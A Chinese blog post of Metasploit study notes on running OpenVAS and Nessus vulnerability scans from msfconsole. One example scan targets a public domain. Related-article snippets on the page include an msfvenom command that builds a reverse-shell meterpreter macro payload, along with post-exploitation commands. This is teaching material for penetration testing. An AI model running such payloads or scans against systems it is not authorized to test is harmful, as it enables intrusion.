MSF学习笔记(7)

最新推荐文章于 2021-03-02 20:00:27 发布
最新推荐文章于 2021-03-02 20:00:27 发布
阅读量716 收藏 4
点赞数
分类专栏: MSF学习笔记 文章标签: MSF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tianyazm/article/details/78718122
版权

msf弱点扫描模块使用

openvas

引入openvas进行扫描,全命令行,使用繁琐

msf > load openvas

导入openvas扫描日志,.nbe格式

msf > db_import openvas.nbe

nessus

导入nessus模块进行扫描

msf > load nessus
[*] Nessus Bridge for Metasploit
[*] Type nessus_help for a command listing
[*] Successfully loaded plugin: Nessus

链接nessus扫描器

msf > nessus_connect -h
[*] You must do this before any other commands.
[*] Usage: 
[*] nessus_connect username:password@hostname:port <ssl_verify/ssl_ignore>
[*] username and password are the ones you use to login to the nessus web front end
[*] hostname can be an IP address or a DNS name of the Nessus server.
[*] port is the RPC port that the Nessus web front end runs on. By default it is TCP port 8834.
[*] The "ssl_verify" to verify the SSL certificate used by the Nessus front end. By default the server
[*] use a self signed certificate, therefore, users should use ssl_ignore.

msf > nessus_connect root:root@192.168.1.1:8834
[*] Connecting to https://192.168..1:8834/ as root
[*] User root authenticated successfully.

查看扫描策略列表

msf > nessus_policy_list 
Policy ID  Name           Policy UUID
---------  ----           -----------
285        advanced scan  ad629e16-03b6-8c1d-cef6-ef8c9dd3c658d24bd260ef5f9e66

创建新扫描任务

msf > nessus_scan_new 
[*] Usage: 
[*] nessus_scan_new <UUID of Policy> <Scan name> <Description> <Targets>
[*] Use nessus_policy_list to list all available policies with their corresponding UUIDs
msf > nessus_scan_new ad629e16-03b6-8c1d-cef6-ef8c9dd3c658d24bd260ef5f9e66 test test_for_test www.sunriver.cn
[*] Creating scan from policy number ad629e16-03b6-8c1d-cef6-ef8c9dd3c658d24bd260ef5f9e66, called test - test_for_test and scanning www.sunriver.cn
[*] New scan added
[*] Use nessus_scan_launch 288 to launch the scan
Scan ID  Scanner ID  Policy ID  Targets          Owner
-------  ----------  ---------  -------          -----
288      1           287        192.168.56.101  root

查看扫描任务列表

msf > nessus_scan_list 
Scan ID  Name                       Owner  Started  Status     Folder
-------  ----                       -----  -------  ------     ------

288      test                       root            empty      3

进行扫描

msf > nessus_scan_launch 288
[+] Scan ID 288 successfully launched. The Scan UUID is 6d3de086-0eb0-c55f-5cee-f8b9cb0abf33e24014baf8a69c0a
tianyazm
关注
专栏目录
MSF学习笔记(10)
Shadow 爬爬记
12-11 699
宏代码生成root@kali root@kali:~/Desktop# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.56.103 LPORT=5555 -e x86/shikata_ga_nai -f vba-exe 利用session 扩大战果 生成后门s
MSF学习笔记(11)
Shadow 爬爬记
02-12 936
本地提权漏洞检测 meterpreter &gt; run post/multi/recon/local_exploit_suggester 迁移到指定进程 migrate -N explorer.exe 自动脚本 msf exploit(multi/handler) &gt; set AutoRunScript migrate -n explorer.exe msf ...
msf入门学习笔记
weixin_34417183的博客
11-11 208
msf—————————————————————————————————————— service postgresql startservice metasploit startmsfconsole进...
MSF学习笔记
weixin_34004750的博客
01-28 70
MSF学习笔记 转载于:https://blog.51cto.com/ronaldqinbiao/1609359
msf 学习笔记(1)
Shadow 爬爬记
10-20 1336
msf数据库链接root@kali:~# msfdb reinit ##数据库重建 root@kali:~# msfdb init ##数据库链接 root@kali:~# service postgresql start ##启动pgsql数据库(5432接口未启动状态【netstat -pantu | grep 5432】) root@kali:~# msfdb start
msf学习笔记(4)
Shadow 爬爬记
11-03 1100
MSF信息收集nmap扫描db_nmap -sV 192.168.1.1auxiliary扫描模块RHOSTS <>RHOST 192.168.1.1-24 192.168.1.1/24 files:/root/ip.txtarp扫描msf > use auxiliary/scanner/discovery/arp_sweep set INTERFACE ̵ RHOSTS̵ SHOST̵ S
msf学习笔记(5)
Shadow 爬爬记
11-03 441
MSF弱点扫描vnc密码破解use auxiliary/scanner/vnc/vnc_loginvnc无密码访问use auxiliary/scanner/vnc/vnc_none_authRDP远程桌面漏洞use auxiliary/scanner/rdp/ms12_020_check设备后门use auxiliary/scanner/ssh/juniper_backdoor use auxil
Metaspolit下如何使用Nessus
子曰小玖的博客
08-06 811
1.登录!以及之前的准备 当然,首先你还是需要先下载好Nessus,我的实验是发现不下载的话我无法开启一些列服务的,Metasploit应该只是调用了它的一个接口吧!(如果有错误欢迎指正!),具体需要如何配置请看我之前的文章http://blog.csdn.net/qq_35078631/article/details/76160336 万物之始我们需要开启Nessus服务,然后使用M...
原创:如何在msfconsole中启动nessus进行漏洞扫描
weixin_39756584的博客
01-20 1550
什么,Nessus又双叒叕安装失败了?
Wawyw's Blog
03-02 2403
1、Nessus简介 Nessus 是目前全世界最多人使用的系统漏洞扫描与分析软件。总共有超过75,000个机构使用Nessus 作为扫描该机构电脑系统的软件,且提供完整的电脑漏洞扫描服务, 并随时更新其漏洞数据库。 2、Nessus原理 Nessus是一种典型的基于客户/服务器结构的网络扫描系统。客户端包括用户配置工具和结果存储/报告生成工具。服务器端包括一个扫描方法库(由插件组成)、当前活动扫描知识库和一个扫描引擎。Nessus的扫描方法采用的是插件技术。插件是用脚本语言编写的子进程,通常系统先制
Nessus windows版 问题汇总(安装后插件消失,扫描不出主机) 8.11.0适用
wooyam的博客
10-10 1万+
Nessus windows版破解问题汇总 1.安装后插件消失 **离线更新包使用2020年6月之前的 csdn中有 可以找找 目前自己在用2020年3月的 6月之后的安装后会自动删除插件** 2.升级专业版后扫描不出主机 **目前8.11.0 在win10中只能使用家庭版 只要win7可以使用专业版 可以安装在win7虚拟机中** win10中安装专业版会出现插件缺失和无法正常扫描 一般安装后 插件超过一页 就算是正常安装了 ...
nessus更新插件经验
热门推荐
SLpkq的博客
06-10 3万+
前言 nessus是目前主流系统漏洞扫描与分析软件,总共有超过75,000个机构使用Nessus 作为扫描该机构电脑系统的软件。可以把nessus扫描结果导入msf_db中,结合强大的msf进行测试工作。 nessus分有家庭版和专业版。专业版收费,有7天免费试用期。家庭版免费,能满足普通用户漏扫需求,一次最多能扫16个IP。国内汉化官网不提供家庭版的下载,安装后家庭版也不支持在线更新,一般更
msfh零二一_MSFH-003:二师姐诗月圆粉墨登场
weixin_32452829的博客
12-28 2万+
大家还记得水沢美心吗?就是上个月底在SOD集团新片商Ms.SOD登场的摩登女郎,作为新片商的开路先锋,水沢美心向观众展示了自己的不凡魅力,如今已经过去了1个月,Ms.SOD再次迎来了第二位新秀,她的名字叫做诗月圆,登场作品MSFH-003。通常新片商的首位女艺人都备受关注,例如FALENO旗下的美乃雀以及Ms.SOD的水沢美心,但詩月まどか的出现却打破了这一常规,以Ms.SOD第二位女艺人身份出场...
Nessus扫描设置
zhaohonghan的博客
06-04 1万+
本文描述的是关于Nessus的扫描设置,是基于Nessus官方文档进行的翻译,仅包含New Scan--Advanced Scan中的选项。 本文基于Nessus8.4的Home版本,官方文档原文链接:https://docs.tenable.com/nessus/Content/GettingStarted.htm Basic基础设置 General常规设置 ...
MSF连接数据库并导入nmap扫描结果
野原新之助
12-22 3335
启动数据库:/etc/init.d/postgresql start 修改用户 postgres 的密码为 postgres:sudo -u postgres psql ALTER USER postgres WITH PASSWORD 'postgres'; root@kali:~# sudo -u postgres psql psql (11.2 (Debian 11.2-2)) 输...
metasploit 情报搜集技术【5】漏洞测试信息数据库与共享
BigYellow
11-09 1394
1、渗透测试信息PostgreSQL数据库service postgresql start启动msfconsole后,可以输入db_status命令,查看数据库的连接状态。 msf > db_status [*] postgresql connected to msf连接到数据库后,可以使用hosts命令检查数据库是否可以正常使用 msf > hostsHosts=====address m
msf 渗透工具学习材料
最新发布
08-20
学习MSF渗透工具有助于提高对网络安全的理解和技能。以下是一些学习MSF渗透工具的材料和方法: 1. 官方文档:Metasploit官方网站提供了完整的文档,包括用户指南、参考手册和教程。这些文档详细介绍了MSF的各个模块...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值